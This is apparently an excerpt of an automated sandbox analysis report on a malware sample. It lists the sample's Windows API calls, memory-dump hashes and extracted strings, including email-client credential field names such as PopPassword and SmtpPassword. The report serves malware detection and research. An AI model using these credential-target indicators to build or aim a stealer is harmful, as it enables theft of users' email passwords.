                                                                      • Instruction Fuzzy Hash: 6B41ACB5D002589FCF10CFA9D884AEEFBB1AF49314F24802AE415B7244D739A949CF54

                                                                      Control-flow Graph

                                                                      control_flow_graph 994 3ad7b1-3ad84c ResumeThread 998 3ad84e-3ad854 994->998 999 3ad855-3ad897 994->999 998->999
                                                                      APIs
                                                                      • ResumeThread.KERNELBASE(?), ref: 003AD836
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: e5795dc8391d3a2328601fc6ee85dfdae146a70d513f9414906f1dcf4ef5b3e3
                                                                      • Instruction ID: 7a15c0bad2c9d2841b4fe13e2ecfab0b0f4ff54d9e0a7caee59ba71fef2d39ec
                                                                      • Opcode Fuzzy Hash: e5795dc8391d3a2328601fc6ee85dfdae146a70d513f9414906f1dcf4ef5b3e3
                                                                      • Instruction Fuzzy Hash: 8731CAB5D002189FCF10CFA9D884AEEFBB5EB49314F24842AE819B7300C735A906CF94
                                                                      APIs
                                                                      • ResumeThread.KERNELBASE(?), ref: 003AD836
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 644f8c61272188629491dde1e53eb94faf6746bdbca9087f5ad75ba9d7f75d07
                                                                      • Instruction ID: 810134707a2e8dd62aafcc32470492c9dca4d1cf87f1b57573453f4f273eee52
                                                                      • Opcode Fuzzy Hash: 644f8c61272188629491dde1e53eb94faf6746bdbca9087f5ad75ba9d7f75d07
                                                                      • Instruction Fuzzy Hash: FE31B9B4D002189FCF14CFA9D984AAEFBB5EF49314F24942AE815B7700C735A945CF94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: gP
                                                                      • API String ID: 0-2783328264
                                                                      • Opcode ID: e5d59a68aa3f0337122e83192a37f4c80bff99a067be896e3eabc3734aff267e
                                                                      • Instruction ID: 7d1acb91180fba5f0189f059d03fa90a51e6068b726907f524dd7f802f2bba09
                                                                      • Opcode Fuzzy Hash: e5d59a68aa3f0337122e83192a37f4c80bff99a067be896e3eabc3734aff267e
                                                                      • Instruction Fuzzy Hash: CE412975E45219CFDB24CFA4C840BEDB7B9BF99300F1096A6D509A6241E7746AC4DF80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (
                                                                      • API String ID: 0-3887548279
                                                                      • Opcode ID: 71fdf9e3463f563da9374203e603bf911714e53e37ba6adcfad83672b1dbdeba
                                                                      • Instruction ID: edb19284fa3f1ab8ca3489e8fa02103801ffed5b165095e05151e7ae4c0195a5
                                                                      • Opcode Fuzzy Hash: 71fdf9e3463f563da9374203e603bf911714e53e37ba6adcfad83672b1dbdeba
                                                                      • Instruction Fuzzy Hash: 3C01EF3590A228CFEB60CF64C884FEDBBB5AB09314F54819AD40DA3252C7359E86DF00
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3a35695c699070e987d51209979f13dd01c6c1a299a16b47fb6d444fc27aeb3d
                                                                      • Instruction ID: 630f5440c87cb63fbc0c5011befa8a5bd29bb1f8ce8a0c1fd54af5d0d3284e92
                                                                      • Opcode Fuzzy Hash: 3a35695c699070e987d51209979f13dd01c6c1a299a16b47fb6d444fc27aeb3d
                                                                      • Instruction Fuzzy Hash: 09414D74909218CFEB64CF54C954BE8B7B9BB4A311F5491DAC40EA3292D7399EC5DF00
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496101460.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13d000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f96b653f214e75f19fd19daed920a72af6fe0ab76211e5c6c0e021f36c48d5d0
                                                                      • Instruction ID: 03c992a4348eac45ac72be90a8f484c26676ca76a0b44247905b8b03d1444a50
                                                                      • Opcode Fuzzy Hash: f96b653f214e75f19fd19daed920a72af6fe0ab76211e5c6c0e021f36c48d5d0
                                                                      • Instruction Fuzzy Hash: 5721C2B5604240EFDB16CF14F9C0B26BBA5FB84314F24C5A9E8494B256C736D84ACB61
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496101460.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13d000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5bac1f1d1689a2ef3b0582937e6aeb3e2dc750e4a8c24c5729f060c24c9b42c2
                                                                      • Instruction ID: 4d967bc66fc9d1a25c83f1b7f0c5bf5a08a76d64203610675017b6464fe62645
                                                                      • Opcode Fuzzy Hash: 5bac1f1d1689a2ef3b0582937e6aeb3e2dc750e4a8c24c5729f060c24c9b42c2
                                                                      • Instruction Fuzzy Hash: 8721B0B5604240EFDB19CF24F8C4B26BB65EB84B14F34C5A9E8494B256C736D84BCBA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: da8908087fa036cfb4662122d7e0595f03acf75d3fdf741a43f9a119e529df9e
                                                                      • Instruction ID: aaa28b7f392200f8a71f84af523e22275354315c58b7c6e9ef10bd5d347ad013
                                                                      • Opcode Fuzzy Hash: da8908087fa036cfb4662122d7e0595f03acf75d3fdf741a43f9a119e529df9e
                                                                      • Instruction Fuzzy Hash: 43212334E09218CFEB60CF64C890BECBBB6BB49300F20909AD40DA7252C7355E86DF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496101460.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13d000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a32f609addacb6cb4880d38ae249acf73ab1d62877314c61fc5c2e4b01bb647b
                                                                      • Instruction ID: c93a144368a3656922636856f90339f43b112a12ea4bafa1108d28c1e8bd612a
                                                                      • Opcode Fuzzy Hash: a32f609addacb6cb4880d38ae249acf73ab1d62877314c61fc5c2e4b01bb647b
                                                                      • Instruction Fuzzy Hash: 502171755083809FCB06CF14E994711BF71EB46714F28C5DAD8498F266C33AD85ACB62
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d40b90a77221328b48a2268ec89e677db94d74da1d50063631a7567e3c27aef
                                                                      • Instruction ID: e64a8c1fa63fa4a92234564f394fb0b7fe0a8210de77e2e982c8ec96c9148812
                                                                      • Opcode Fuzzy Hash: 7d40b90a77221328b48a2268ec89e677db94d74da1d50063631a7567e3c27aef
                                                                      • Instruction Fuzzy Hash: 64118C70A45218DFEB60CF54CC80BEDB7B8AB19300F6480EAD54EA7281CBB45AC5DF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496101460.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13d000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                      • Instruction ID: 67c540baf6bac1ad4bbaa40799964805698ccef35c79b973d5445efff56ac4c6
                                                                      • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                      • Instruction Fuzzy Hash: AE119D75904280DFDB12CF14E5C4B16FFA1FB84314F28C6ADD8494B656C33AD85ACBA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16136ae1cd7fdcd11885db866d9257f4138747396bbf34985dd533787d5a5df3
                                                                      • Instruction ID: 0a59b7bf07c597e03ba5c43bc94f5ccf76a6757abd35b60fc3e549936a6799f3
                                                                      • Opcode Fuzzy Hash: 16136ae1cd7fdcd11885db866d9257f4138747396bbf34985dd533787d5a5df3
                                                                      • Instruction Fuzzy Hash: EF1105B8D04209DFCB44DFA9D8556AEBBF5BF89300F2090AAC919A3305E7345B41DF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: acb82c64e3bd211dfc3698f1a566779a691a59fa4cfc053c369635303a1d1762
                                                                      • Instruction ID: 33904b7333c9175db9d02e15d0337a1bb8f36968ea6994750b744d2152694cc3
                                                                      • Opcode Fuzzy Hash: acb82c64e3bd211dfc3698f1a566779a691a59fa4cfc053c369635303a1d1762
                                                                      • Instruction Fuzzy Hash: 2A112975A45218DFEB60CF54CC80BECB7B8AB19300F64909AE54DA7281C7B49AC5DF50
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3af8cc4b40f8fc807402b2fb5cce783107f483bb9b180507a903aab2bcbc1098
                                                                      • Instruction ID: 14ec585d00919a92dbf14256dcda2c7dba2210c1955cc014bac668082eb6b60b
                                                                      • Opcode Fuzzy Hash: 3af8cc4b40f8fc807402b2fb5cce783107f483bb9b180507a903aab2bcbc1098
                                                                      • Instruction Fuzzy Hash: B7112774908228CFDB60DF64C895BECBBB4AB0A311F1449D9D00DAB292C7388EC9CF44
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9cdab949b55843e2528cf989bd35f12d3088ef32c6bde4829261a70e00edfc30
                                                                      • Instruction ID: fc9561a2626fc2bc80e15cbd0b850491fe7d99e5946bafc41c1facb6468b195c
                                                                      • Opcode Fuzzy Hash: 9cdab949b55843e2528cf989bd35f12d3088ef32c6bde4829261a70e00edfc30
                                                                      • Instruction Fuzzy Hash: 7F014F75A44218DFEB20CF50CC81BECB7B8AB19300F24809AE50DA7281C7745AC5CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e135f80a5234cc77c46636c04c03a40c59bb6fa0bf7f43f178d6979e4f93fb57
                                                                      • Instruction ID: 8864b785bb78a582efe1b4bdbebcd7f4bdad5b25cfc567b68f5fc067bfcd41ec
                                                                      • Opcode Fuzzy Hash: e135f80a5234cc77c46636c04c03a40c59bb6fa0bf7f43f178d6979e4f93fb57
                                                                      • Instruction Fuzzy Hash: 67014C74E092548FDB51CF64CC94ADDBBB5BF4A304F2440EAD909AB246C3325A41DF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6e5585fb6f5a5d0fafdabf5d77b5280ecb42de4d8b920b2b8d13e3cb56fd2853
                                                                      • Instruction ID: fc538d12078c3d35b1da0b0203beafbd9de296086a7f099722cdd3f1e2544fba
                                                                      • Opcode Fuzzy Hash: 6e5585fb6f5a5d0fafdabf5d77b5280ecb42de4d8b920b2b8d13e3cb56fd2853
                                                                      • Instruction Fuzzy Hash: 1A013C35906228CFDF60CFA0CD40BEDBBB5EF59305F6850DA904DA7262C2359A86DF41
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71d4c480bd031ce089c98df3f2ff4ec81adba229f5ecd7005cb0718245376d30
                                                                      • Instruction ID: 33ee8223953e7ac3c3a634863f888586744a85e26e912dbbce775422e6b71c89
                                                                      • Opcode Fuzzy Hash: 71d4c480bd031ce089c98df3f2ff4ec81adba229f5ecd7005cb0718245376d30
                                                                      • Instruction Fuzzy Hash: C5F0F4B4E00209DFDB40DFB9C940AAEFBF5AB49300F1495AAC818E3311EB359A01DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86eabc558f395c795a701a9699c4f2db3093f386afbe1a4cae00ef111b9c5f4c
                                                                      • Instruction ID: e0de721ed48344e2cf3fca0825e2d66abbcb1483bac2608b3e1c81dfe9012540
                                                                      • Opcode Fuzzy Hash: 86eabc558f395c795a701a9699c4f2db3093f386afbe1a4cae00ef111b9c5f4c
                                                                      • Instruction Fuzzy Hash: 8301A935918394CFD710CB14C855AECBBB4BF06321F1881D6881E972D3D7344945CF40
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e0fb6a3678e8528f13c2e3a86d9b5081ef27767d1fd57895729925473f20f406
                                                                      • Instruction ID: 4dac1b4aed7ce42063860c4d2d07f32cb99685be3bb2b9fa96a58bb62dfa04b6
                                                                      • Opcode Fuzzy Hash: e0fb6a3678e8528f13c2e3a86d9b5081ef27767d1fd57895729925473f20f406
                                                                      • Instruction Fuzzy Hash: EF01AF75940228DFEBA0DF54C891BD8B7B4AB09311F5485D9D60CA3241DB399FC5DF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 76cd2a1dca863ee597df0322fc0a603e5e4a7e525b7b26d46ebb77f97ad1f476
                                                                      • Instruction ID: e13024664bf5450a9997ad05a783d0947e694a0d6e5befae8403a3b141934ece
                                                                      • Opcode Fuzzy Hash: 76cd2a1dca863ee597df0322fc0a603e5e4a7e525b7b26d46ebb77f97ad1f476
                                                                      • Instruction Fuzzy Hash: E3F03070D04208DFDF00DFA5E9546AEBBB8AB4A301F1091A6C409A3252D7341A45EF88

                                                                      Execution Graph

                                                                      Execution Coverage:2.9%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:1.3%
                                                                      Total number of Nodes:299
                                                                      Total number of Limit Nodes:12

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                                      • GetLastError.KERNEL32 ref: 0041399E
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Error$CreateLastModeMutex
                                                                      • String ID:
                                                                      • API String ID: 3448925889-0
                                                                      • Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                                                                      • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                                      • Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                                                                      • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                        • Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                      • RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                                      • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Heap$AllocOpenProcessQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3676486918-0
                                                                      • Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                                                                      • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                                      • Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                                                                      • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

                                                                      Control-flow Graph

                                                                      control_flow_graph 82 404df3-404e16 WSAStartup
                                                                      APIs
                                                                      • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Startup
                                                                      • String ID:
                                                                      • API String ID: 724789610-0
                                                                      • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                      • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                                      • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                      • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

                                                                      Control-flow Graph

                                                                      control_flow_graph 83 402c1f-402c37 call 4031e5 LoadLibraryW
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                                                                      • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                                      • Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                                                                      • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

                                                                      Control-flow Graph

                                                                      control_flow_graph 86 413a3f-413a57 call 4031e5 ExitProcess
                                                                      APIs
                                                                      • ExitProcess.KERNELBASE(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                                                                      • Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
                                                                      • Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                                                                      • Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

                                                                      Control-flow Graph

                                                                      control_flow_graph 89 4049ff-404a18 call 4031e5 RegCloseKey
                                                                      APIs
                                                                      • RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                                                                      • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                                      • Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                                                                      • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 0040438F
                                                                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                                      • VariantInit.OLEAUT32(?), ref: 004043C4
                                                                      • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                                      • VariantInit.OLEAUT32(?), ref: 00404414
                                                                      • SysAllocString.OLEAUT32(?), ref: 00404419
                                                                      • VariantInit.OLEAUT32(?), ref: 00404431
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                                      • String ID:
                                                                      • API String ID: 1312198159-0
                                                                      • Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                                                                      • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                                      • Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                                                                      • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                                      • API String ID: 0-2111798378
                                                                      • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                      • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                                      • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                      • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                      Memory Dump Source
                                                                      • Source File: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_28_2_400000_rrwscqkDSNwLK.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
